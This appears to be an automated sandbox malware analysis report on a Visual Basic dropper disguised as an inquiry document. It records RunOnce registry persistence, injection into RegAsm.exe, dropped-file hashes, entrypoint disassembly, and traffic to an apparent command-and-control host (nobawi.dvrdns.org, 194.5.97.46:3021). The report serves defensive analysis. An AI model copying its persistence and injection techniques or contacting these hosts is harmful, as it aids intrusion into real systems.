                                • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odc-web-geo.onedrive.akadns.net, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, emea2.notify.windows.com.akadns.net, login.msa.msidentity.com, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, umwatsonrouting.trafficmanager.net, db5p.wns.notify.windows.com.akadns.net, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, login.live.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, odc-sn-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target demisphereklediskene.exe, PID 1812 because there are no executed functions
• Execution Graph export aborted for target demisphereklediskene.exe, PID 2140 because there are no executed functions
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Signature Similarity

Sample Name | Analysis ID | SHA256 | Similarity (sample distance, 10 = nearest)

                                Simulations

                                Behavior and APIs

Time | Type | Description
09:17:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnesses C:\Users\user\Hustankesgy3\demisphereklediskene.exe
09:17:34 | API Interceptor | 4x Sleep call for process: RegAsm.exe modified
09:17:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKP "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
09:17:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnesses C:\Users\user\Hustankesgy3\demisphereklediskene.exe
09:17:55 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKP "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

Match | Associated Sample Name / URL | Detection | Context (IP)
DANILENKODE | Notificare de expediere a serviciului de curierat FAN.exe | malicious | 194.5.98.4
DANILENKODE | Stub.exe | malicious | 194.5.97.76
DANILENKODE | CEsezvn5.exe | malicious | 194.5.97.98
DANILENKODE | order_doc#79922021.pdf.exe | malicious | 194.5.97.76
DANILENKODE | Specifications Drawing Sketch Details-img.exe | malicious | 194.5.98.23
DANILENKODE | 5wJh9Cykwx.exe | malicious | 194.5.98.68
DANILENKODE | u51x5QFXXu.exe | malicious | 194.5.97.55
DANILENKODE | 2020.09.01.SS.08.39_Export.pdf.exe | malicious | 194.5.97.23
DANILENKODE | jBMJ2TUHK4.exe | malicious | 194.5.98.95
DANILENKODE | m5ug7w1BclUkH8g.exe | malicious | 194.5.98.225
DANILENKODE | KR-310820.EXE | malicious | 194.5.97.15
DANILENKODE | QgpyVFbQ7w.exe | malicious | 194.5.98.95
DANILENKODE | Pos withdrawal reduced to 0.5%.exe | malicious | 194.5.97.16
DANILENKODE | U5AxjHFcx0zbmCE.exe | malicious | 194.5.97.93
DANILENKODE | SecuriteInfo.com.ArtemisF2D018C0AB1C.exe | malicious | 194.5.98.95
DANILENKODE | SecuriteInfo.com.Trojan.Inject3.53454.32340.exe | malicious | 194.5.98.95
DANILENKODE | RFQ_282008.exe | malicious | 194.5.97.15
DANILENKODE | RFQ_HartBrothersLimited7685745646490SD.xlsm | malicious | 194.5.98.249
DANILENKODE | PO-250820.exe | malicious | 194.5.97.15
DANILENKODE | PO-260820.exe | malicious | 194.5.97.15

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\7433cdb324b04dd5e3c3db213381216c7c539baa
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:ASCII text, with no line terminators
                                Size (bytes):6
                                Entropy (8bit):2.584962500721156
                                Encrypted:false
                                MD5:332825AF0394E728F74AFD416AF782DE
                                SHA1:2E1F37FCDF50AD24B9CF565340B4192031B4DA4F
                                SHA-256:7E8E21F8DAAE7B8A0C1FC6AB294A32226B12024405C6B841B402FC1E21A358E1
                                SHA-512:D8D386CA3208A7F9AF56C4DDC717D14D5796DB9A265C75ACBA3CA5139332891172A68334B050C3C358B4CAE7165FDF14C1798FE7ABE2DC23AE9054060910D060
                                Malicious:false
                                Reputation:low
                                Preview: 782501
                                C:\ProgramData\782401\anibtcent.exe.exe
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Size (bytes):53248
                                Entropy (8bit):4.489035167606714
                                Encrypted:false
                                MD5:6AFAE79556E125202DCF1D3FE74A3638
                                SHA1:1F0CD73E2A999298F4AACC9F4F4435D0E0C5841E
                                SHA-256:3A2671887FA27F16624D0E560985DE57C421B686AF6546ECF799F96B301E4DDD
                                SHA-512:E418A6A5EE03253D9CE5EF5A414AF1F89940FA1BD47DA47110EA8CFBA037669DD052AC5E2B8AE45938C09B25B071ECC1307251059D77B494C359E0C8924AF081
                                Malicious:false
                                Antivirus:
• Antivirus: Virustotal, Detection: 0%
• Antivirus: Metadefender, Detection: 0%
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:dj[..................... .......... ........@.. ..............................H$....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Size (bytes):20
                                Entropy (8bit):3.6841837197791887
                                Encrypted:false
                                MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: 1,"fusion","GAC",0..
                                C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\anibtcent.exe.exe.log
                                Process:C:\ProgramData\782401\anibtcent.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Size (bytes):20
                                Entropy (8bit):3.6841837197791887
                                Encrypted:false
                                MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: 1,"fusion","GAC",0..
                                C:\Users\user\Hustankesgy3\demisphereklediskene.exe
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Size (bytes):77824
                                Entropy (8bit):4.268810997769698
                                Encrypted:false
                                MD5:01A54F73856CFB74A3BBBA47BCEC227B
                                SHA1:ED2ED885DCD7BE832CDAE5C189BD7DB78CA9EAA2
                                SHA-256:759C87F02D5850EE317454DC8242067D042A320F653946C9162B645C0AE68BA6
                                SHA-512:C14F28C00A7344F039BFC30D658E3E5C1D3DB08EA7AC31F4574587F8FE17492DD2E0D73374CDEC51A90E79D5569F21645BC4E59EBE5A1362CC5E04A8CAAD8516
                                Malicious:true
                                Antivirus:
• Antivirus: Virustotal, Detection: 21%
                                • Antivirus: ReversingLabs, Detection: 19%
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......X.....................0....................@..........................@..............................................t...(....0..$...................................................................0... ....................................text...d........................... ..`.data...............................@....rsrc...$....0....... ..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Windows\SysWOW64\clientsvr.exe
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Size (bytes):53248
                                Entropy (8bit):4.489035167606714
                                Encrypted:false
                                MD5:6AFAE79556E125202DCF1D3FE74A3638
                                SHA1:1F0CD73E2A999298F4AACC9F4F4435D0E0C5841E
                                SHA-256:3A2671887FA27F16624D0E560985DE57C421B686AF6546ECF799F96B301E4DDD
                                SHA-512:E418A6A5EE03253D9CE5EF5A414AF1F89940FA1BD47DA47110EA8CFBA037669DD052AC5E2B8AE45938C09B25B071ECC1307251059D77B494C359E0C8924AF081
                                Malicious:false
                                Antivirus:
• Antivirus: Virustotal, Detection: 0%
• Antivirus: Metadefender, Detection: 0%
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:dj[..................... .......... ........@.. ..............................H$....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                \Device\ConDrv
                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Size (bytes):1010
                                Entropy (8bit):4.301794875780381
                                Encrypted:false
                                MD5:89358C11D21070BAC4F92BFA5F9034FF
                                SHA1:8D94E1B07DE5B7BC0A819709478FBC62F627296F
                                SHA-256:B5C37651006A8E8BA3D665795B374F5047796B0EFB4B664134654CDF869EBBF0
                                SHA-512:5D519C044F7B1781D78632B7857B87DD4ADE4AD39868A79D50C2055D917D43898540A05CF5DD4A65AC68E71F8D7751D24353153D5289BBE60118F7FC31AC8FA1
                                Malicious:false
                                Reputation:low
                                Preview: Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.9031..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information.. /? or /help Display this usage

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):4.268810997769698
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:New Inquiry 903838737777721102029393003938.exe
                                File size:77824
                                MD5:01a54f73856cfb74a3bbba47bcec227b
                                SHA1:ed2ed885dcd7be832cdae5c189bd7db78ca9eaa2
                                SHA256:759c87f02d5850ee317454dc8242067d042a320f653946c9162b645c0ae68ba6
                                SHA512:c14f28c00a7344f039bfc30d658e3e5c1d3db08ea7ac31f4574587f8fe17492dd2e0d73374cdec51a90e79d5569f21645bc4e59ebe5a1362cc5e04a8caad8516
                                SSDEEP:768:tidhxH/lEJLqTyouZbjbKel+SA2sJ80Mos:tchVWJLkyoKbR+SsJ817
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......X.....................0....................@........

                                File Icon

                                Icon Hash:20047c7c70f0e004

                                Static PE Info

                                General

                                Entrypoint:0x401198
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:
                                Time Stamp:0x58E2F1AE [Tue Apr 4 01:06:54 2017 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:68aad53882cd0699d0056766eec5d383

                                Entrypoint Preview

                                Instruction
                                push 0040152Ch
                                call 00007F8484E1D895h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                dec eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edi], cl
                                into
                                jbe 00007F8484E1D8EBh
                                ret
                                cmp al, 59h
                                dec eax
                                mov ebp, F52EDF18h
                                mov edi, 0000DE0Dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [eax], eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push edi
                                push 6E657469h
                                jnc 00007F8484E1D912h
                                popad
                                je 00007F8484E1D918h
                                imul esi, dword ptr [edi+33h], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                dec esp
                                xor dword ptr [eax], eax
                                add al, 7Fh
                                mov al, 11h
                                popfd
                                xchg eax, ebp
                                sbb eax, C8A14621h
                                mov al, 14h
                                pushad

                                Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10874 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x924 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x230 | 0x20 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x94 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xfb64 | 0x10000 | False | 0.325119018555 | data | 4.5495521333 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x13b0 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x13000 | 0x924 | 0x1000 | False | 0.173583984375 | data | 2.00822109273 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x137f4 | 0x130 | data | |
RT_ICON | 0x1350c | 0x2e8 | data | |
RT_ICON | 0x133e4 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0x133b4 | 0x30 | data | |
RT_VERSION | 0x13150 | 0x264 | data | French | France

                                Imports

DLL | Import
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaFreeVar, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                Version Infos

Description | Data
Translation | 0x040c 0x04b0
InternalName | Strenger
FileVersion | 1.00
CompanyName | BaconSplitter
Comments | BaconSplitter
ProductName | Whitenspagettiw3
ProductVersion | 1.00
OriginalFilename | Strenger.exe

                                Possible Origin

Language of compilation system | Country where language is spoken
French | France

                                Network Behavior

                                Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/17/20-09:17:35.647111 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 62644 | 1.1.1.1 | 192.168.0.80
09/17/20-09:17:45.373911 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 57998 | 1.1.1.1 | 192.168.0.80
09/17/20-09:17:49.824955 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 62566 | 1.1.1.1 | 192.168.0.80

                                Network Port Distribution

                                TCP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Sep 17, 2020 09:17:35.654803991 CEST | 49780 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:38.653953075 CEST | 49780 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:44.667840958 CEST | 49780 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:45.192441940 CEST | 3021 | 49780 | 194.5.97.46 | 192.168.0.80
                                Sep 17, 2020 09:17:45.375614882 CEST | 49781 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:48.385880947 CEST | 49781 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:48.396872044 CEST | 3021 | 49781 | 194.5.97.46 | 192.168.0.80
                                Sep 17, 2020 09:17:48.901237965 CEST | 49781 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:49.494385004 CEST | 3021 | 49781 | 194.5.97.46 | 192.168.0.80
                                Sep 17, 2020 09:17:49.826248884 CEST | 49784 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:50.117470980 CEST | 3021 | 49784 | 194.5.97.46 | 192.168.0.80
                                Sep 17, 2020 09:17:50.619613886 CEST | 49784 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:50.794392109 CEST | 3021 | 49784 | 194.5.97.46 | 192.168.0.80
                                Sep 17, 2020 09:17:51.306924105 CEST | 49784 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:54.958060980 CEST | 3021 | 49784 | 194.5.97.46 | 192.168.0.80
                                Sep 17, 2020 09:17:55.088757038 CEST | 49785 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:17:55.265065908 CEST | 3021 | 49785 | 194.5.97.46 | 192.168.0.80
                                Sep 17, 2020 09:17:55.774595022 CEST | 49785 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:18:01.788693905 CEST | 49785 | 3021 | 192.168.0.80 | 194.5.97.46
                                Sep 17, 2020 09:18:02.425591946 CEST | 3021 | 49785 | 194.5.97.46 | 192.168.0.80

                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Sep 17, 2020 09:16:15.561140060 CEST | 49451 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:16:15.565572977 CEST | 53 | 49451 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:16:21.787764072 CEST | 55506 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:16:21.791841984 CEST | 53 | 55506 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:16:31.149914026 CEST | 63845 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:16:31.169645071 CEST | 53 | 63845 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:16:34.521147966 CEST | 56004 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:16:34.532773018 CEST | 53 | 56004 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:17:29.691212893 CEST | 57708 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:17:29.695420980 CEST | 53 | 57708 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:17:30.439835072 CEST | 56079 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:17:30.530215025 CEST | 53 | 56079 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:17:35.487384081 CEST | 62644 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:17:35.647110939 CEST | 53 | 62644 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:17:45.353795052 CEST | 57998 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:17:45.373910904 CEST | 53 | 57998 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:17:48.758219957 CEST | 49721 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:17:48.767934084 CEST | 53 | 49721 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:17:49.451086998 CEST | 53676 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:17:49.516685009 CEST | 53 | 53676 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:17:49.611742020 CEST | 62566 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:17:49.824954987 CEST | 53 | 62566 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:17:55.077337027 CEST | 52075 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:17:55.087174892 CEST | 53 | 52075 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:18:01.974023104 CEST | 51394 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:18:01.993537903 CEST | 53 | 51394 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:18:02.650759935 CEST | 56038 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:18:02.655469894 CEST | 53 | 56038 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:18:03.229505062 CEST | 62469 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:18:03.233412981 CEST | 53 | 62469 | 1.1.1.1 | 192.168.0.80
                                Sep 17, 2020 09:18:03.276026011 CEST | 59275 | 53 | 192.168.0.80 | 1.1.1.1
                                Sep 17, 2020 09:18:03.287719965 CEST | 53 | 59275 | 1.1.1.1 | 192.168.0.80

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Sep 17, 2020 09:17:29.691212893 CEST | 192.168.0.80 | 1.1.1.1 | 0x196b | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:30.439835072 CEST | 192.168.0.80 | 1.1.1.1 | 0x5ee6 | Standard query (0) | eaup2w.sn.files.1drv.com | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:35.487384081 CEST | 192.168.0.80 | 1.1.1.1 | 0x56aa | Standard query (0) | nobawi.dvrdns.org | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:45.353795052 CEST | 192.168.0.80 | 1.1.1.1 | 0x4529 | Standard query (0) | nobawi.dvrdns.org | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:48.758219957 CEST | 192.168.0.80 | 1.1.1.1 | 0x4adb | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:49.451086998 CEST | 192.168.0.80 | 1.1.1.1 | 0x83c6 | Standard query (0) | eaup2w.sn.files.1drv.com | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:49.611742020 CEST | 192.168.0.80 | 1.1.1.1 | 0xfc10 | Standard query (0) | nobawi.dvrdns.org | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:55.077337027 CEST | 192.168.0.80 | 1.1.1.1 | 0x9167 | Standard query (0) | nobawi.dvrdns.org | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:18:02.650759935 CEST | 192.168.0.80 | 1.1.1.1 | 0x4bb2 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:18:03.276026011 CEST | 192.168.0.80 | 1.1.1.1 | 0x73ea | Standard query (0) | eaup2w.sn.files.1drv.com | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Sep 17, 2020 09:17:29.695420980 CEST | 1.1.1.1 | 192.168.0.80 | 0x196b | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                Sep 17, 2020 09:17:30.530215025 CEST | 1.1.1.1 | 192.168.0.80 | 0x5ee6 | No error (0) | eaup2w.sn.files.1drv.com | odc-sn-files-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                Sep 17, 2020 09:17:35.647110939 CEST | 1.1.1.1 | 192.168.0.80 | 0x56aa | No error (0) | nobawi.dvrdns.org | - | 194.5.97.46 | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:45.373910904 CEST | 1.1.1.1 | 192.168.0.80 | 0x4529 | No error (0) | nobawi.dvrdns.org | - | 194.5.97.46 | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:48.767934084 CEST | 1.1.1.1 | 192.168.0.80 | 0x4adb | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                Sep 17, 2020 09:17:49.516685009 CEST | 1.1.1.1 | 192.168.0.80 | 0x83c6 | No error (0) | eaup2w.sn.files.1drv.com | odc-sn-files-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                Sep 17, 2020 09:17:49.824954987 CEST | 1.1.1.1 | 192.168.0.80 | 0xfc10 | No error (0) | nobawi.dvrdns.org | - | 194.5.97.46 | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:17:55.087174892 CEST | 1.1.1.1 | 192.168.0.80 | 0x9167 | No error (0) | nobawi.dvrdns.org | - | 194.5.97.46 | A (IP address) | IN (0x0001)
                                Sep 17, 2020 09:18:02.655469894 CEST | 1.1.1.1 | 192.168.0.80 | 0x4bb2 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
                                Sep 17, 2020 09:18:03.287719965 CEST | 1.1.1.1 | 192.168.0.80 | 0x73ea | No error (0) | eaup2w.sn.files.1drv.com | odc-sn-files-geo.onedrive.akadns.net | - | CNAME (Canonical name) | IN (0x0001)

                                Code Manipulations

                                Statistics

                                CPU Usage


                                Memory Usage


                                High Level Behavior Distribution


                                Behavior


                                System Behavior

                                General

                                Start time: 09:15:53
                                Start date: 17/09/2020
                                Path: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
                                Imagebase: 0x400000
                                File size: 77824 bytes
                                MD5 hash: 01A54F73856CFB74A3BBBA47BCEC227B
                                Has administrator privileges: true
                                Programmed in: Visual Basic
                                Reputation: low

                                General

                                Start time: 09:17:25
                                Start date: 17/09/2020
                                Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                Wow64 process (32bit): false
                                Commandline: 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
                                Imagebase: 0xb0000
                                File size: 53248 bytes
                                MD5 hash: 6AFAE79556E125202DCF1D3FE74A3638
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: low

                                General

                                Start time: 09:17:25
                                Start date: 17/09/2020
                                Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
                                Imagebase: 0xae0000
                                File size: 53248 bytes
